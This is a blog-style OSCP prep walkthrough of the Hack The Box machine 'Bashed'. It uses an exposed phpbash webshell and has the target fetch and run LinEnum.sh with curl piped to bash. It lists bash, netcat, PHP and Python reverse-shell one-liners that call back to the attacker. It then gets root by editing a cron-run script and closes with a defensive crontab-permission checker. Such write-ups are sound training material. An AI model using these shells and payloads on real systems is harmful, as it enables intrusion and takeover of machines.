Come one, come all! Who is here for some OSCP knowledge? As promised, a new IppSec write-up has arrived! And I have decided to do a write-up for every tutorial in the OSCP prep series found here: IPPSEC OSCP prep videos
Using Cherry Tree to take notes while performing an exploit.
Open Cherry Tree
Ctrl+N = New Tree
Ctrl+Shift+N = New Branch (Sub Notes for new commands)
PrtSc to take screen shots
Let’s get to the Box!
root@kali:~# nmap -sC -sV -oA nmap/initial IP.OF.TAR.GET
- -sC = run the default nmap scripts
- -sV = enumerate service versions
- -oA = output in all formats, followed by the output path (here nmap/initial)
- Then the IP of the target
root@kali:~# cat nmap/initial.nmap
- cat allows you to view the contents of the file
We see that port 80 is open and it is running: Apache httpd 2.4.18 (Ubuntu)
Copy and paste the contents into Cherry Tree
Let’s check the version of Ubuntu running by checking the Apache version.
Open Google and Search for: ubuntu httpd versions
- Click packages.ubuntu.com Apache 2
- We will discover that Xenial 16.04 will be running version 2.4.18
- Enter that discovered information into Cherry Tree
Browse to the IP.OF.TAR.GET and see if it returns a WebPage
- Returns phpbash
- Has a link to a GitHub page
- Browse to the “Exact server” link and see that a webshell program was developed
Browse to the GitHub Page for phpbash
- Copy the code into Cherry Tree
- Create a New Branch and Paste it.. Might be useful later
Now Let’s Run GoBuster on the site for anything useful
Gobuster is a tool used to brute-force:
- URIs (directories and files) in web sites.
- DNS subdomains (with wildcard support).
https://tools.kali.org/web-applications/gobuster
root@kali:~# /opt/gobuster/gobuster -u http://IP.OF.TAR.GET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
- -u = target URL
- -w = wordlist
Let’s browse to the different directories we find
- http://IP.OF.TAR.GET/directory
- Take screenshots of what you find and add it to a new branch
So far we have found:
- php
- min.php
- php
Click on the link: phpbash.php
Run the following:
- id
- hostname
- ifconfig
Check what comes back.
This verifies that the commands are running on the target server itself.
- Take a screenshot and add it to Cherry Tree
Kill GoBuster and let's run a Linux privilege checker on the host
root@kali:~# cp /opt/linux_privesc/LinEnum.sh .
root@kali:~# python -m SimpleHTTPServer 80
We are going to serve LinEnum.sh from this Simple HTTP server so the target can fetch it
Switch over to the Browser location: IP.OF.TAR.GET/dev/phpbash.php
Run the following:
www-data@bashed:/var/www/html/dev# curl IP.OF.YOU.RPC/LinEnum.sh | bash
- Sad face.. didn’t work
- Tried wget didn’t work here.. let’s change directories
www-data@bashed:/var/www/html/dev# cd /dev/shm
www-data@bashed:/dev/shm# wget IP.OF.YOU.RPC/LinEnum.sh
- It's running! (wget works from /dev/shm, unlike the web root)
www-data@bashed:/dev/shm# ls
- Give it a minute to run
- Copy and Paste all the Output to a new branch in Cherry Tree
When looking through the data, keep this in mind:
- The root user has UID 0. Most Linux distributions reserve the first 100 UIDs for system use. New users are assigned UIDs starting from 500 or 1000; for example, new users in Ubuntu start from 1000
- When you create a new account, it will usually be given the next-highest unused number. If we create a new user on our Ubuntu system, it will be given the UID of 1001
We also find that we can run sudo without supplying a password
Remember.. the phpbash shell is not persistent. Each command you send runs in a fresh shell, so nothing you start in one command survives to the next
We need a reverse shell to get a persistent session
Switch back to your box
PenTestMonkey: Reverse shell cheat sheet:
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Let’s set up a listener on our host machine
root@kali:~# nc -lvnp 8081
Switch back to the phpbash shell
www-data@bashed:/dev/shm# bash -i >& /dev/tcp/IP.OF.YOU.RPC/8081 0>&1
- No call back.. let’s try the Net Cat one.. more reliable!
www-data@bashed:/dev/shm# rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP.OF.YOU.RPC 8081 >/tmp/f
- Still no shell.. hmmm let’s try the PHP One
www-data@bashed:/dev/shm# php -r '$sock=fsockopen("IP.OF.YOU.RPC",8081);exec("/bin/sh -i <&3 >&3 2>&3");'
- Hmmm still no shell. Let's go back and review the phpbash code
- We discover that it is appending a redirect
- Let's try uploading a reverse shell, then executing it
If you remember from GoBuster there was a /uploads directory
www-data@bashed:/dev/shm# cd /var/www/html/uploads
www-data@bashed:/var/www/html/uploads# ls
- Nothing in there
www-data@bashed:/var/www/html/uploads# touch test
- This will create a file in the directory
In your browser go back to:
http://IP.OF.TAR.GET/uploads/test
- The file is present! We know because we didn't get a 404 error
With our nc listener still running, let's create a PHP reverse shell
- The PHP reverse shell is on Kali Linux by default
Open another terminal window
root@kali:~# cp /opt/shell/php/php-reverse-shell.php .
- Now that we have copied it into our directory, let’s verify some settings
root@kali:~# vi php-reverse-shell.php
- Check the IP (your IP)
- Port: 8081
Now let’s ensure our Python Simple HTTP Server is still running
root@kali:~# python -m SimpleHTTPServer 80
- Still running? Good.
Switch back to the Browser php shell
www-data@bashed:/var/www/html/uploads# wget 10.10.14.30/php-reverse-shell.php
It is uploaded.. now navigate to it
http://IP.OF.TAR.GET/uploads/php-reverse-shell.php
Switch back to your terminal where Net Cat listener is running
Sweet.. we got a shell
$ id
- To see who we are (rights)
$ python -c 'import pty;pty.spawn("/bin/bash")'
- Now we have a bash shell
www-data@bashed:/$ ^Z
- ^ = Ctrl (Ctrl+Z backgrounds the shell)
root@kali:~# stty raw -echo
root@kali:~# fg
- With echo turned off you won't see the fg you type; the shell prints nc -lvnp 8081 as the job comes back to the foreground
www-data@bashed:/$ sudo -u scriptmanager bash
scriptmanager@bashed:/$ id
- Now we are the scriptmanager user
scriptmanager@bashed:/$ ls -la
- We see a folder called scripts.. most likely belongs to the scriptmanager
scriptmanager@bashed:/$ cd scripts
scriptmanager@bashed:/scripts$ ls -la
- test.py
- test.txt
scriptmanager@bashed:/scripts$ date
- Compare the date with the timestamp on test.txt from ls -la: test.txt keeps getting updated every minute
- Let's take a look at test.py and see what it is doing, but first let's bring our bash prompt back
scriptmanager@bashed:/scripts$ python -c 'import pty;pty.spawn("/bin/bash")'
scriptmanager@bashed:/scripts$ vi test.py
- We see that it opens test.txt, writes 'testing 123!' to it and then closes it
Let's edit that test.py
and paste in the Python reverse shell code from PenTestMonkey
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Note: Make sure you edit this so it applies to your setup
- Get rid of the semicolons and make them new lines
- Change the IP to your machine
Now let's run our newly edited test.py (the scheduled job that rewrites test.txt every minute will also run it as root, which is what gives the root shell below)
scriptmanager@bashed:/scripts$ python test.py
Go back to terminal and run a new listener
root@kali:~# nc -lvnp 1234
- Now would be a good time add some notes to CherryTree
- Did you get a shell? I got a shell… totes got a shell
- Guess what.. we also got root.. because root owns the test.txt file
# id
uid=0(root)
Note: You may have to stop and start the listener a few times.
# cd /root
# ls
- We see root.txt
# wc -c root.txt
- It's 32 characters, which tells us it's an MD5 hash
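The whole privilege escalation on this box comes down to one misconfiguration: root runs a script on a schedule that scriptmanager can edit. Added here as an example (not from the original write-up or IppSec's video) is the defender-side check a sysadmin would run: parse an /etc/crontab-style file and flag root jobs whose script is owned or writable by a non-root user. The crontab text and the file ownership values are constructed, since the page never shows the box's real crontab.

```python
import re
import stat
from typing import Dict, List, Tuple

# Constructed /etc/crontab-style input (the walkthrough never shows the box's
# real crontab): a root job runs a script every minute, like test.py on Bashed.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
* * * * * root python /scripts/test.py
17 * * * * root cd / && run-parts --report /etc/cron.hourly
"""

# Constructed stat results: path -> (owner uid, group gid, permission bits).
# uid 1001 stands in for an unprivileged account such as scriptmanager.
SAMPLE_STAT = {
    "/scripts/test.py": (1001, 1001, 0o644),
    "/etc/cron.hourly": (0, 0, 0o755),
}

def find_risky_root_jobs(crontab: str,
                         stat_of: Dict[str, Tuple[int, int, int]]) -> List[Tuple[str, str]]:
    """Return (path, reason) for every root cron job whose script a non-root user can modify."""
    findings = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue  # blank line, comment, or environment assignment
        fields = line.split(None, 6)  # five time fields, user, command
        if len(fields) < 7 or fields[5] != "root":
            continue  # malformed entry, or not executed as root
        for token in fields[6].split():
            if token not in stat_of:
                continue  # no metadata for this token (a flag, or a binary found via PATH)
            uid, gid, mode = stat_of[token]
            if uid != 0:
                findings.append((token, f"owned by uid {uid}, not root"))
            elif mode & stat.S_IWOTH:
                findings.append((token, "world-writable"))
            elif mode & stat.S_IWGRP and gid != 0:
                findings.append((token, f"writable by group gid {gid}"))
    return findings

if __name__ == "__main__":
    for path, reason in find_risky_root_jobs(SAMPLE_CRONTAB, SAMPLE_STAT):
        print(f"[!] root job runs {path}: {reason}")
```

The fix is the one the audit implies: anything root runs on a schedule should be owned by root and writable by nobody else.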
Yay!!! All done.. we kick arse!
#donecodealone